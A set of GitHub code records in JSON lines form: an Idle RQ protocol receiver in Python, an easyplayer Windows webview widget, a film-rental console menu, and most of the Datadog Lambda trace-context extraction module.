bytearray\n    i = 0  # Frame number that we are waiting for\n\n    while True:\n        # PresentState=WTIFM; Waiting for event: IRCVD\n        print(\"Waiting for an I-frame ...\")\n        frame_data = sockfile.recv(2)\n        \n        if not frame_data:\n            print(\"Primary has closed connection, unexpected behavior!\")\n            return i\n        \n        frame = int.from_bytes(frame_data, byteorder='big')\n        corrup = corrupted(frame)\n        NS = testbit(frame, SEQ_BIT)\n        Vr = i % 2\n        P0 = NS == Vr\n        P1 = not corrup\n        P2 = NS == (not Vr)\n        last = testbit(frame, LAST_INDICATOR_BIT) and P0 and P1\n        print(f\" < Receiving {'a corrupted ' if corrup else 'the last ' if last else ''}I-frame {i}: \", end='')\n        printbits(frame)\n        printstat(frame)\n        ack = 0\n        X = NS\n        isack = 0  # default, so the \"impossible\" branch below cannot leave it unset\n        \n        if not P1:\n            # TxNAK(X);\n            isack = 0\n        else:\n            if P2:\n                isack = 1\n                print(\"The I-frame order is invalid. Duplication detected.\")\n                print(f\"Expected N(S)=Vr={Vr}, got N(S)={X}\")\n            elif P0:\n                frames[i] = frame\n                isack = 1\n                i += 1\n            else:\n                print(\"P1 and not P2 and not P0, impossible\")\n\n        ack = setbit(ack, ACK_BIT, isack)\n        ack = setbit(ack, SEQ_BIT, X)\n        ack = setbit(ack, PARITY_BIT, parity(ack))\n        print(f\"> Sending {'ACK' if testbit(ack, ACK_BIT) else 'NAK'} frame: \", end='')\n        printbits(ack)\n        printstat(ack)\n        mightsend(sockfile, ack)\n\n        # Check for the last frame\n        if last:\n            print(\"Got the last frame, stopped\")\n            break\n\n    # Join packets from frames together into buf\n    print(\"Joining frames ...\")\n    joinframes(frames, buf, i)\n    return i  # the parameter shadows the builtin, so the old \"return len(buf)\" raised a TypeError\n\n\ndef joinframes(frames, buf, len):\n    for i in range(len):\n        buf[i] = 0\n        for j in range(8):\n            if testbit(frames[i], j):\n                buf[i] |= 1 << j\n    buf[len] = 0\n\ndef makeframes(buf, len):\n    print(buf)\n    frames = [0] * (len + 1)  # 16-bit frame values do not fit in a bytearray\n    fNo = 0  # current frame number that we are filling bits into\n    done = False\n    while not done:\n        frames[fNo] = 0\n        for i in range(8):\n            if int(tobytebits(buf[fNo]), 2) & (1 << i):  # parse the bit string as base 2\n                frames[fNo] |= 1 << i\n        \n        # add seqNo bit\n        if fNo % 2:\n            frames[fNo] = setbit(frames[fNo], SEQ_BIT, 1)  # setbit returns the new value; it must be assigned\n        # print(fNo)\n        if fNo + 1 >= len - 1 or tobytebits(buf[fNo + 1]) == 0:  # check the bound first to avoid an IndexError\n            frames[fNo] = setbit(frames[fNo], LAST_INDICATOR_BIT, 1)\n            done = True\n            frames[fNo + 1] = 0\n        \n        # add parity bit\n        if parity(frames[fNo]):\n            frames[fNo] = setbit(frames[fNo], PARITY_BIT, 1)\n        \n        fNo += 1\n    \n    return frames\n\ndef parity(frame):\n    result = 0\n    for i in range(PARITY_BIT):\n        result ^= (frame >> i) & 1\n    return result\n\ndef corrupted(frame):\n    return parity(frame) != ((frame >> PARITY_BIT) & 1)\n\ndef printstat(frame):\n    print(\"\\n\")","repo_name":"emxzy03/idle-rq-unix","sub_path":"idleRQ.py","file_name":"idleRQ.py","file_ext":"py","file_size_in_byte":6520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33644548987","text":"\"\"\"\r\nEasy Player webview widget module.\r\n\r\nThis code shows syntax errors in PyCharm, but it runs normally.\r\n\"\"\"\r\n\r\nimport ctypes\r\nimport sys\r\nfrom typing import Tuple, Callable, Any\r\n\r\nfrom easyplayer.exceptions import EasyPlayerOSError, EasyPlayerSaverError, EasyPlayerModuleError\r\nfrom easyplayer.core.saver import queue\r\n\r\nif sys.platform != 'win32':\r\n    raise EasyPlayerOSError('Only supported on Windows OS')\r\n\r\nimport threading\r\n\r\ntry:\r\n    import clr\r\nexcept (ImportError, ModuleNotFoundError):\r\n    raise EasyPlayerModuleError('please install pythonnet (it provides the clr module)') from None\r\n\r\ntry:\r\n    # Add reference\r\n    clr.AddReference('System.Windows.Forms')\r\n    clr.AddReference('System.Threading')\r\nexcept OSError:\r\n    raise EasyPlayerOSError('Only supported on Windows OS') from None\r\nfrom System.Windows.Forms import * # Pycharm syntax error\r\nfrom System.Threading import Thread, ApartmentState, ThreadStart # Pycharm syntax error\r\n\r\n_app = Application # Pycharm syntax error\r\n_user32 = ctypes.windll.user32\r\n\r\nclass _Form(object):\r\n    \"\"\"\r\n    Default form.\r\n    \"\"\"\r\n\r\n\r\n__all__ = ['WebView']\r\n\r\n\r\nclass WebView(object):\r\n    def __init__(self, size: Tuple[int, int] = (1200, 550), url: str = '',\r\n                 script_errors_suppressed: bool = True, menu_enabled: bool = True):\r\n        \"\"\"\r\n        Easy Player webview widget.\r\n        \r\n        Warning: available only on Windows systems.\r\n        \r\n        :param size: Widget size.\r\n        :param url: Default URL.\r\n        :param 
script_errors_suppressed: Script errors suppressed.\r\n        :param menu_enabled: Is the menu enabled.\r\n        \"\"\"\r\n        if not queue:\r\n            raise EasyPlayerSaverError('please create a game first')\r\n        self._game = queue[-1]\r\n        self._screen = self._game.screen\r\n\r\n        self.width, self.height = size\r\n        \r\n        form = _Form()\r\n        # Must use thread\r\n        threading.Thread(target=self._get_web, args=(form, self.width, self.height)).start()\r\n        \r\n        while True:\r\n            try:\r\n                ie = form.web\r\n                break\r\n            except AttributeError:\r\n                pass\r\n        \r\n        ie.ScriptErrorsSuppressed = script_errors_suppressed\r\n        self.ie_hwnd = int(str(ie.Handle))\r\n        self.x, self.y = 0, 0\r\n        # Use win32api\r\n        _user32.SetParent(self.ie_hwnd, self._game.hwnd)\r\n        self._move()\r\n        \r\n        if url != '':\r\n            ie.Navigate(url)\r\n        self.ie = ie\r\n        self.ie.IsWebBrowserContextMenuEnabled = menu_enabled\r\n        self.ie.NewWindow += self._before_window\r\n        \r\n        self.url = url\r\n        \r\n    @staticmethod\r\n    def _get_web(form: _Form, width: int, height: int):\r\n        \"\"\"\r\n        Set the form attr.\r\n        \r\n        :param form: This form.\r\n        :param width: Width.\r\n        :param height: Height.\r\n        :return: None\r\n        \"\"\"\r\n        web = WebBrowser() # Pycharm syntax error\r\n        form.web = web\r\n        web.Width = width\r\n        web.Height = height\r\n        \r\n    def _before_window(self, sender, e):\r\n        \"\"\"\r\n        A handler.\r\n        \r\n        :param sender: Sender.\r\n        :param e: E.\r\n        :return: None\r\n        \"\"\"\r\n        href = sender.Document.ActiveElement.GetAttribute('href')\r\n        self.set_url(href)\r\n        e.Cancel = True\r\n        \r\n    def _move(self):\r\n        _user32.MoveWindow(self.ie_hwnd, self.x, self.y, self.width, self.height, True)\r\n        \r\n    @property\r\n    def pos(self):\r\n        return self.x, self.y\r\n    \r\n    @pos.setter\r\n    def pos(self, set_pos: Tuple[int, int]):\r\n        self.x, self.y = set_pos\r\n        self._move()\r\n\r\n    def set_url(self, url: str):\r\n        \"\"\"\r\n        Set the URL of this webview.\r\n        \r\n        :param url: URL.\r\n        :return: None\r\n        \"\"\"\r\n        self.url = url\r\n        self.ie.Navigate(url)\r\n        \r\n    def show_url(self, func: Callable[[], Any]):\r\n        \"\"\"\r\n        A decorator to register a callback function that runs when the URL changes.\r\n        \r\n        Warning: this is a test function; it is unstable!\r\n\r\n        :param func: Callback function.\r\n        :return: None\r\n        \"\"\"\r\n        self.ie.Navigating += func\r\n        \r\n    def resize(self, width: int, height: int):\r\n        \"\"\"\r\n        Resize webview.\r\n        \r\n        :param width: Width.\r\n        :param height: Height.\r\n        :return: None\r\n        \"\"\"\r\n        self.width, self.height = width, height\r\n        self.ie.Width = width\r\n        self.ie.Height = height\r\n        \r\n    def destroy(self):\r\n        \"\"\"\r\n        Destroy this web view.\r\n        \r\n        :return: None\r\n        \"\"\"\r\n        self.ie.Dispose()\r\n        del self.ie\r\n","repo_name":"stripepython/easyplayer","sub_path":"easyplayer/utils/wintools/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"14137879321","text":"\"\"\"\n@@@ Vintila Radu @@@\n\"\"\"\n\nfrom UI.meniu_client import Client_meniu\nfrom UI.meniu_film import Film_meniu\nfrom UI.meniu_inchiriere import Inchiriere_meniu\nfrom UI.meniu_rapoarte import Rapoarte_meniu\n\n\nclass Console:\n    def __init__(self, srv_client, srv_film, srv_inc):\n        self.__srv_client = srv_client\n        self.__srv_film = srv_film\n        self.__srv_inc = srv_inc\n\n    @staticmethod\n    def printeaza_optiuni():\n        print('''\n1. Client menu\n2. Film menu\n3. Rental menu\n4. Report menu\n0. Exit application\n        ''')\n\n    def show(self):\n        while True:\n            self.printeaza_optiuni()\n            cmd = input(\"Enter the desired option: \")\n\n            try:\n                if cmd == \"0\":\n                    print(\"You have exited the application!\")\n                    return\n                elif cmd == \"1\":\n                    Client_meniu(self.__srv_client).afisare()\n                elif cmd == \"2\":\n                    Film_meniu(self.__srv_film).afisare()\n                elif cmd == \"3\":\n                    Inchiriere_meniu(self.__srv_inc).afisare()\n                elif cmd == \"4\":\n                    Rapoarte_meniu(self.__srv_client, self.__srv_film, self.__srv_inc).afisare()\n                else:\n                    print(\"You did not enter a valid option!\")\n            except ValueError:\n                print(\"You did not enter a valid option!\")\n            except KeyError:\n                print(\"You did not enter a valid option!\")\n","repo_name":"krotek20/college-ubb-labs","sub_path":"1st year/FP/lab79/UI/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"47762761044","text":"import hashlib\nimport logging\nimport os\nimport json\nimport base64\nfrom datetime import datetime, timezone\nfrom typing import Optional, Dict\n\nfrom datadog_lambda.metric import submit_errors_metric\n\ntry:\n    from typing import Literal\nexcept ImportError:\n    # Literal was added to typing in python 3.8\n    from typing_extensions import Literal\n\nfrom datadog_lambda.constants import (\n    SamplingPriority,\n    TraceHeader,\n    TraceContextSource,\n    XrayDaemon,\n    Headers,\n)\nfrom datadog_lambda.xray import (\n    send_segment,\n    parse_xray_header,\n)\nfrom ddtrace import tracer, patch, Span\nfrom ddtrace import __version__ as ddtrace_version\nfrom ddtrace.propagation.http import HTTPPropagator\nfrom datadog_lambda import __version__ as datadog_lambda_version\nfrom datadog_lambda.trigger import (\n    _EventSource,\n    parse_event_source,\n    get_first_record,\n    EventTypes,\n    EventSubtypes,\n)\n\ndd_trace_otel_enabled = (\n    os.environ.get(\"DD_TRACE_OTEL_ENABLED\", \"false\").lower() == \"true\"\n)\nif dd_trace_otel_enabled:\n    from opentelemetry.trace import set_tracer_provider\n    from ddtrace.opentelemetry import TracerProvider\n\n    set_tracer_provider(TracerProvider())\n\n\nlogger = logging.getLogger(__name__)\n\ndd_trace_context = {}\ndd_tracing_enabled = os.environ.get(\"DD_TRACE_ENABLED\", \"false\").lower() == \"true\"\n\npropagator = HTTPPropagator()\n\n\ndef _convert_xray_trace_id(xray_trace_id):\n    \"\"\"\n    Convert X-Ray trace id (hex)'s last 63 bits to a Datadog trace id (int).\n    \"\"\"\n    return str(0x7FFFFFFFFFFFFFFF & int(xray_trace_id[-16:], 16))\n\n\ndef _convert_xray_entity_id(xray_entity_id):\n    \"\"\"\n    Convert X-Ray (sub)segment id (hex) to a Datadog span id (int).\n    \"\"\"\n    return str(int(xray_entity_id, 16))\n\n\ndef _convert_xray_sampling(xray_sampled):\n    \"\"\"\n    Convert X-Ray sampled (True/False) to its Datadog counterpart.\n    \"\"\"\n    return (\n        str(SamplingPriority.USER_KEEP)\n        if xray_sampled\n        else str(SamplingPriority.USER_REJECT)\n    )\n\n\ndef _get_xray_trace_context():\n    if not is_lambda_context():\n        return None\n\n    xray_trace_entity = parse_xray_header(\n        os.environ.get(XrayDaemon.XRAY_TRACE_ID_HEADER_NAME, \"\")\n    )\n    if xray_trace_entity is None:\n        return None\n    trace_context = {\n        \"trace-id\": _convert_xray_trace_id(xray_trace_entity.get(\"trace_id\")),\n        \"parent-id\": _convert_xray_entity_id(xray_trace_entity.get(\"parent_id\")),\n        \"sampling-priority\": _convert_xray_sampling(xray_trace_entity.get(\"sampled\")),\n    }\n    logger.debug(\n        \"Converted trace context %s from X-Ray segment %s\",\n        trace_context,\n        (\n            
xray_trace_entity[\"trace_id\"],\n xray_trace_entity[\"parent_id\"],\n xray_trace_entity[\"sampled\"],\n ),\n )\n return trace_context\n\n\ndef _get_dd_trace_py_context():\n span = tracer.current_span()\n if not span:\n return None\n\n parent_id = span.context.span_id\n trace_id = span.context.trace_id\n sampling_priority = span.context.sampling_priority\n logger.debug(\n \"found dd trace context: %s\", (span.context.trace_id, span.context.span_id)\n )\n return {\n \"parent-id\": str(parent_id),\n \"trace-id\": str(trace_id),\n \"sampling-priority\": str(sampling_priority),\n \"source\": TraceContextSource.DDTRACE,\n }\n\n\ndef _context_obj_to_headers(obj):\n return {\n TraceHeader.TRACE_ID: str(obj.get(\"trace-id\")),\n TraceHeader.PARENT_ID: str(obj.get(\"parent-id\")),\n TraceHeader.SAMPLING_PRIORITY: str(obj.get(\"sampling-priority\")),\n }\n\n\ndef create_dd_dummy_metadata_subsegment(\n subsegment_metadata_value, subsegment_metadata_key\n):\n \"\"\"\n Create a Datadog subsegment to pass the Datadog trace context or Lambda function\n tags into its metadata field, so the X-Ray trace can be converted to a Datadog\n trace in the Datadog backend with the correct context.\n \"\"\"\n send_segment(subsegment_metadata_key, subsegment_metadata_value)\n\n\ndef extract_context_from_lambda_context(lambda_context):\n \"\"\"\n Extract Datadog trace context from the `client_context` attr\n from the Lambda `context` object.\n\n dd_trace libraries inject this trace context on synchronous invocations\n \"\"\"\n client_context = lambda_context.client_context\n trace_id = None\n parent_id = None\n sampling_priority = None\n if client_context and client_context.custom:\n if \"_datadog\" in client_context.custom:\n # Legacy trace propagation dict\n dd_data = client_context.custom.get(\"_datadog\", {})\n trace_id = dd_data.get(TraceHeader.TRACE_ID)\n parent_id = dd_data.get(TraceHeader.PARENT_ID)\n sampling_priority = dd_data.get(TraceHeader.SAMPLING_PRIORITY)\n elif (\n TraceHeader.TRACE_ID in client_context.custom\n and TraceHeader.PARENT_ID in client_context.custom\n and TraceHeader.SAMPLING_PRIORITY in client_context.custom\n ):\n # New trace propagation keys\n trace_id = client_context.custom.get(TraceHeader.TRACE_ID)\n parent_id = client_context.custom.get(TraceHeader.PARENT_ID)\n sampling_priority = client_context.custom.get(TraceHeader.SAMPLING_PRIORITY)\n\n return trace_id, parent_id, sampling_priority\n\n\ndef extract_context_from_http_event_or_context(\n event,\n lambda_context,\n event_source: _EventSource,\n decode_authorizer_context: bool = True,\n):\n \"\"\"\n Extract Datadog trace context from the `headers` key in from the Lambda\n `event` object.\n\n Falls back to lambda context if no trace data is found in the `headers`\n \"\"\"\n if decode_authorizer_context:\n is_http_api = event_source.equals(\n EventTypes.API_GATEWAY, subtype=EventSubtypes.HTTP_API\n )\n injected_authorizer_data = get_injected_authorizer_data(event, is_http_api)\n if injected_authorizer_data:\n try:\n # fail fast on any KeyError here\n trace_id = injected_authorizer_data[TraceHeader.TRACE_ID]\n parent_id = injected_authorizer_data[TraceHeader.PARENT_ID]\n sampling_priority = injected_authorizer_data.get(\n TraceHeader.SAMPLING_PRIORITY\n )\n return trace_id, parent_id, sampling_priority\n except Exception as e:\n logger.debug(\n \"extract_context_from_authorizer_event returned with error. 
\\\n Continue without injecting the authorizer span %s\",\n e,\n )\n\n headers = event.get(\"headers\", {}) or {}\n lowercase_headers = {k.lower(): v for k, v in headers.items()}\n\n trace_id = lowercase_headers.get(TraceHeader.TRACE_ID)\n parent_id = lowercase_headers.get(TraceHeader.PARENT_ID)\n sampling_priority = lowercase_headers.get(TraceHeader.SAMPLING_PRIORITY)\n\n if not trace_id or not parent_id or not sampling_priority:\n return extract_context_from_lambda_context(lambda_context)\n\n return trace_id, parent_id, sampling_priority\n\n\ndef create_sns_event(message):\n return {\n \"Records\": [\n {\n \"EventSource\": \"aws:sns\",\n \"EventVersion\": \"1.0\",\n \"Sns\": message,\n }\n ]\n }\n\n\ndef extract_context_from_sqs_or_sns_event_or_context(event, lambda_context):\n \"\"\"\n Extract Datadog trace context from an SQS event.\n\n The extraction chain goes as follows:\n EB => SQS (First records body contains EB context), or\n SNS => SQS (First records body contains SNS context), or\n SQS or SNS (`messageAttributes` for SQS context,\n `MessageAttributes` for SNS context), else\n Lambda Context.\n\n Falls back to lambda context if no trace data is found in the SQS message attributes.\n \"\"\"\n\n # EventBridge => SQS\n try:\n (\n trace_id,\n parent_id,\n sampling_priority,\n ) = _extract_context_from_eventbridge_sqs_event(event)\n return trace_id, parent_id, sampling_priority\n except Exception:\n logger.debug(\"Failed extracting context as EventBridge to SQS.\")\n\n try:\n first_record = event.get(\"Records\")[0]\n\n # logic to deal with SNS => SQS event\n if \"body\" in first_record:\n body_str = first_record.get(\"body\", {})\n try:\n body = json.loads(body_str)\n if body.get(\"Type\", \"\") == \"Notification\" and \"TopicArn\" in body:\n logger.debug(\"Found SNS message inside SQS event\")\n first_record = get_first_record(create_sns_event(body))\n except Exception:\n first_record = event.get(\"Records\")[0]\n pass\n\n msg_attributes = first_record.get(\n \"messageAttributes\",\n first_record.get(\"Sns\", {}).get(\"MessageAttributes\", {}),\n )\n dd_payload = msg_attributes.get(\"_datadog\", {})\n # SQS uses dataType and binaryValue/stringValue\n # SNS uses Type and Value\n dd_json_data_type = dd_payload.get(\"Type\", dd_payload.get(\"dataType\", \"\"))\n if dd_json_data_type == \"Binary\":\n dd_json_data = dd_payload.get(\n \"binaryValue\",\n dd_payload.get(\"Value\", r\"{}\"),\n )\n dd_json_data = base64.b64decode(dd_json_data)\n elif dd_json_data_type == \"String\":\n dd_json_data = dd_payload.get(\n \"stringValue\",\n dd_payload.get(\"Value\", r\"{}\"),\n )\n else:\n logger.debug(\n \"Datadog Lambda Python only supports extracting trace\"\n \"context from String or Binary SQS/SNS message attributes\"\n )\n dd_data = json.loads(dd_json_data)\n trace_id = dd_data.get(TraceHeader.TRACE_ID)\n parent_id = dd_data.get(TraceHeader.PARENT_ID)\n sampling_priority = dd_data.get(TraceHeader.SAMPLING_PRIORITY)\n\n return trace_id, parent_id, sampling_priority\n except Exception as e:\n logger.debug(\"The trace extractor returned with error %s\", e)\n return extract_context_from_lambda_context(lambda_context)\n\n\ndef _extract_context_from_eventbridge_sqs_event(event):\n \"\"\"\n Extracts Datadog trace context from an SQS event triggered by\n EventBridge.\n\n This is only possible if first record in `Records` contains a\n `body` field which contains the EventBridge `detail` as a JSON string.\n \"\"\"\n try:\n first_record = event.get(\"Records\")[0]\n if \"body\" in first_record:\n 
body_str = first_record.get(\"body\", {})\n body = json.loads(body_str)\n\n detail = body.get(\"detail\")\n dd_context = detail.get(\"_datadog\")\n trace_id = dd_context.get(TraceHeader.TRACE_ID)\n parent_id = dd_context.get(TraceHeader.PARENT_ID)\n sampling_priority = dd_context.get(TraceHeader.SAMPLING_PRIORITY)\n return trace_id, parent_id, sampling_priority\n except Exception:\n raise\n\n\ndef extract_context_from_eventbridge_event(event, lambda_context):\n \"\"\"\n Extract datadog trace context from an EventBridge message's Details.\n This is only possible if Details is a JSON string.\n \"\"\"\n try:\n detail = event.get(\"detail\")\n dd_context = detail.get(\"_datadog\")\n if not dd_context:\n return extract_context_from_lambda_context(lambda_context)\n trace_id = dd_context.get(TraceHeader.TRACE_ID)\n parent_id = dd_context.get(TraceHeader.PARENT_ID)\n sampling_priority = dd_context.get(TraceHeader.SAMPLING_PRIORITY)\n return trace_id, parent_id, sampling_priority\n except Exception as e:\n logger.debug(\"The trace extractor returned with error %s\", e)\n return extract_context_from_lambda_context(lambda_context)\n\n\ndef extract_context_from_kinesis_event(event, lambda_context):\n \"\"\"\n Extract datadog trace context from a Kinesis Stream's base64 encoded data string\n \"\"\"\n try:\n record = get_first_record(event)\n data = record.get(\"kinesis\", {}).get(\"data\", None)\n if data:\n b64_bytes = data.encode(\"ascii\")\n str_bytes = base64.b64decode(b64_bytes)\n data_str = str_bytes.decode(\"ascii\")\n data_obj = json.loads(data_str)\n dd_ctx = data_obj.get(\"_datadog\")\n\n if not dd_ctx:\n return extract_context_from_lambda_context(lambda_context)\n\n trace_id = dd_ctx.get(TraceHeader.TRACE_ID)\n parent_id = dd_ctx.get(TraceHeader.PARENT_ID)\n sampling_priority = dd_ctx.get(TraceHeader.SAMPLING_PRIORITY)\n return trace_id, parent_id, sampling_priority\n except Exception as e:\n logger.debug(\"The trace extractor returned with error %s\", e)\n return extract_context_from_lambda_context(lambda_context)\n\n\ndef _deterministic_md5_hash(s: str) -> str:\n \"\"\"MD5 here is to generate trace_id, not for any encryption.\"\"\"\n hex_number = hashlib.md5(s.encode(\"ascii\")).hexdigest()\n binary = bin(int(hex_number, 16))\n binary_str = str(binary)\n binary_str_remove_0b = binary_str[2:].rjust(128, \"0\")\n most_significant_64_bits_without_leading_1 = \"0\" + binary_str_remove_0b[1:-64]\n result = str(int(most_significant_64_bits_without_leading_1, 2))\n if result == \"0\" * 64:\n return \"1\"\n return result\n\n\ndef extract_context_from_step_functions(event, lambda_context):\n \"\"\"\n Only extract datadog trace context when Step Functions Context Object is injected\n into lambda's event dict.\n \"\"\"\n try:\n execution_id = event.get(\"Execution\").get(\"Id\")\n state_name = event.get(\"State\").get(\"Name\")\n state_entered_time = event.get(\"State\").get(\"EnteredTime\")\n trace_id = _deterministic_md5_hash(execution_id)\n parent_id = _deterministic_md5_hash(\n execution_id + \"#\" + state_name + \"#\" + state_entered_time\n )\n sampling_priority = SamplingPriority.AUTO_KEEP\n return trace_id, parent_id, sampling_priority\n except Exception as e:\n logger.debug(\"The Step Functions trace extractor returned with error %s\", e)\n return extract_context_from_lambda_context(lambda_context)\n\n\ndef extract_context_custom_extractor(extractor, event, lambda_context):\n \"\"\"\n Extract Datadog trace context using a custom trace extractor function\n \"\"\"\n try:\n (\n trace_id,\n 
parent_id,\n            sampling_priority,\n        ) = extractor(event, lambda_context)\n        return trace_id, parent_id, sampling_priority\n    except Exception as e:\n        logger.debug(\"The trace extractor returned with error %s\", e)\n\n    return None, None, None\n\n\ndef is_authorizer_response(response) -> bool:\n    try:\n        return (\n            response is not None\n            and response[\"principalId\"]\n            and response[\"policyDocument\"]\n        )\n    except (KeyError, AttributeError):\n        pass\n    except Exception as e:\n        logger.debug(\"unknown error while checking is_authorizer_response %s\", e)\n    return False\n\n\ndef get_injected_authorizer_data(event, is_http_api) -> dict:\n    try:\n        authorizer_headers = event.get(\"requestContext\", {}).get(\"authorizer\")\n        if not authorizer_headers:\n            return None\n\n        dd_data_raw = (\n            authorizer_headers.get(\"lambda\", {}).get(\"_datadog\")\n            if is_http_api\n            else authorizer_headers.get(\"_datadog\")\n        )\n\n        if not dd_data_raw:\n            return None\n\n        injected_data = json.loads(base64.b64decode(dd_data_raw))\n\n        # A Lambda authorizer's results can be cached, and the payload still carries the injected\n        # data on cached requests, so we have to detect the cached case and ignore that data.\n        # API Gateway automatically injects integrationLatency data in some cases; if it's >0 we\n        # know the result is not cached. But integrationLatency is not available in the Http API\n        # case. There we use the injected Authorizing_Request_Id to tell if the result is cached.\n        # Token authorizers, however, don't pass on the requestId, so the Authorizing_Request_Id\n        # can't cover all cases either. As a result, we combine both methods as shown below.\n        if authorizer_headers.get(\"integrationLatency\", 0) > 0 or event.get(\n            \"requestContext\", {}\n        ).get(\"requestId\") == injected_data.get(Headers.Authorizing_Request_Id):\n            return injected_data\n        else:\n            return None\n\n    except Exception as e:\n        logger.debug(\"Failed to check if invoked by an authorizer. 
error %s\", e)\n return None\n\n\ndef extract_dd_trace_context(\n event, lambda_context, extractor=None, decode_authorizer_context: bool = True\n):\n \"\"\"\n Extract Datadog trace context from the Lambda `event` object.\n\n Write the context to a global `dd_trace_context`, so the trace\n can be continued on the outgoing requests with the context injected.\n \"\"\"\n global dd_trace_context\n trace_context_source = None\n event_source = parse_event_source(event)\n\n if extractor is not None:\n (\n trace_id,\n parent_id,\n sampling_priority,\n ) = extract_context_custom_extractor(extractor, event, lambda_context)\n elif isinstance(event, (set, dict)) and \"headers\" in event:\n (\n trace_id,\n parent_id,\n sampling_priority,\n ) = extract_context_from_http_event_or_context(\n event, lambda_context, event_source, decode_authorizer_context\n )\n elif event_source.equals(EventTypes.SNS) or event_source.equals(EventTypes.SQS):\n (\n trace_id,\n parent_id,\n sampling_priority,\n ) = extract_context_from_sqs_or_sns_event_or_context(event, lambda_context)\n elif event_source.equals(EventTypes.EVENTBRIDGE):\n (\n trace_id,\n parent_id,\n sampling_priority,\n ) = extract_context_from_eventbridge_event(event, lambda_context)\n elif event_source.equals(EventTypes.KINESIS):\n (\n trace_id,\n parent_id,\n sampling_priority,\n ) = extract_context_from_kinesis_event(event, lambda_context)\n elif event_source.equals(EventTypes.STEPFUNCTIONS):\n (\n trace_id,\n parent_id,\n sampling_priority,\n ) = extract_context_from_step_functions(event, lambda_context)\n else:\n trace_id, parent_id, sampling_priority = extract_context_from_lambda_context(\n lambda_context\n )\n\n if trace_id and parent_id and sampling_priority:\n logger.debug(\"Extracted Datadog trace context from event or context\")\n metadata = {\n \"trace-id\": trace_id,\n \"parent-id\": parent_id,\n \"sampling-priority\": sampling_priority,\n }\n dd_trace_context = metadata.copy()\n trace_context_source = TraceContextSource.EVENT\n else:\n # AWS Lambda runtime caches global variables between invocations,\n # reset to avoid using the context from the last invocation.\n dd_trace_context = _get_xray_trace_context()\n if dd_trace_context:\n trace_context_source = TraceContextSource.XRAY\n logger.debug(\"extracted dd trace context %s\", dd_trace_context)\n return dd_trace_context, trace_context_source, event_source\n\n\ndef get_dd_trace_context():\n \"\"\"\n Return the Datadog trace context to be propagated on the outgoing requests.\n\n If the Lambda function is invoked by a Datadog-traced service, a Datadog\n trace context may already exist, and it should be used. 
Otherwise, use the\n    current X-Ray trace entity, or the dd-trace-py context if DD_TRACE_ENABLED is true.\n\n    Most widely-used HTTP clients are patched to inject the context\n    automatically, but this function can be used to manually inject the trace\n    context into an outgoing request.\n    \"\"\"\n    if dd_tracing_enabled:\n        dd_trace_py_context = _get_dd_trace_py_context()\n        if dd_trace_py_context is not None:\n            return _context_obj_to_headers(dd_trace_py_context)\n\n    global dd_trace_context\n\n    xray_context = None  # keep the name bound even if reading the segment fails below\n    try:\n        xray_context = _get_xray_trace_context()  # xray (sub)segment\n    except Exception as e:\n        logger.debug(\n            \"get_dd_trace_context couldn't read the segment from X-Ray, with error %s\"\n            % e\n        )\n    if not xray_context:\n        return {}\n\n    if not dd_trace_context:\n        return _context_obj_to_headers(xray_context)\n\n    context = dd_trace_context.copy()\n    context[\"parent-id\"] = xray_context.get(\"parent-id\")\n    logger.debug(\"Set parent id from xray trace context: %s\", context.get(\"parent-id\"))\n\n    return _context_obj_to_headers(context)\n\n\ndef set_correlation_ids():\n    \"\"\"\n    Create a dummy span and override its trace_id and span_id to make\n    ddtrace.helpers.get_log_correlation_context() return a dict containing the correct ids for both\n    auto and manual log correlations.\n\n    TODO: Remove me when Datadog tracer is natively supported in Lambda.\n    \"\"\"\n    if not is_lambda_context():\n        logger.debug(\"set_correlation_ids is only supported in LambdaContext\")\n        return\n    if dd_tracing_enabled:\n        logger.debug(\"using ddtrace implementation for spans\")\n        return\n\n    context = get_dd_trace_context()\n    if not context:\n        return\n\n    span = tracer.trace(\"dummy.span\")\n    span.trace_id = int(context[TraceHeader.TRACE_ID])\n    span.span_id = int(context[TraceHeader.PARENT_ID])\n\n    logger.debug(\"correlation ids set\")\n\n\ndef inject_correlation_ids():\n    \"\"\"\n    Override the formatter of LambdaLoggerHandler to inject datadog trace and\n    span id for log correlation.\n\n    For manual injections to custom log handlers, use `ddtrace.helpers.get_log_correlation_context`\n    to retrieve a dict containing correlation ids (trace_id, span_id).\n    \"\"\"\n    # Override the log format of the AWS provided LambdaLoggerHandler\n    root_logger = logging.getLogger()\n    for handler in root_logger.handlers:\n        if (\n            handler.__class__.__name__ == \"LambdaLoggerHandler\"\n            and type(handler.formatter) == logging.Formatter\n        ):\n            handler.setFormatter(\n                logging.Formatter(\n                    \"[%(levelname)s]\\t%(asctime)s.%(msecs)dZ\\t%(aws_request_id)s\\t\"\n                    \"[dd.trace_id=%(dd.trace_id)s dd.span_id=%(dd.span_id)s]\\t%(message)s\\n\",\n                    \"%Y-%m-%dT%H:%M:%S\",\n                )\n            )\n\n    # Patch `logging.Logger.makeRecord` to actually inject correlation ids\n    patch(logging=True)\n\n    logger.debug(\"logs injection configured\")\n\n\ndef is_lambda_context():\n    \"\"\"\n    Return True if the X-Ray context is `LambdaContext`, rather than the\n    regular `Context` (e.g., when testing lambda functions locally).\n    \"\"\"\n    return os.environ.get(XrayDaemon.FUNCTION_NAME_HEADER_NAME, \"\") != \"\"\n\n\ndef set_dd_trace_py_root(trace_context_source, merge_xray_traces):\n    if trace_context_source == TraceContextSource.EVENT or merge_xray_traces:\n        context = dict(dd_trace_context)\n        if merge_xray_traces:\n            xray_context = _get_xray_trace_context()\n            if xray_context is not None:\n                context[\"parent-id\"] = xray_context.get(\"parent-id\")\n\n        headers = _context_obj_to_headers(context)\n        span_context = propagator.extract(headers)\n        tracer.context_provider.activate(span_context)\n        logger.debug(\n            \"Set 
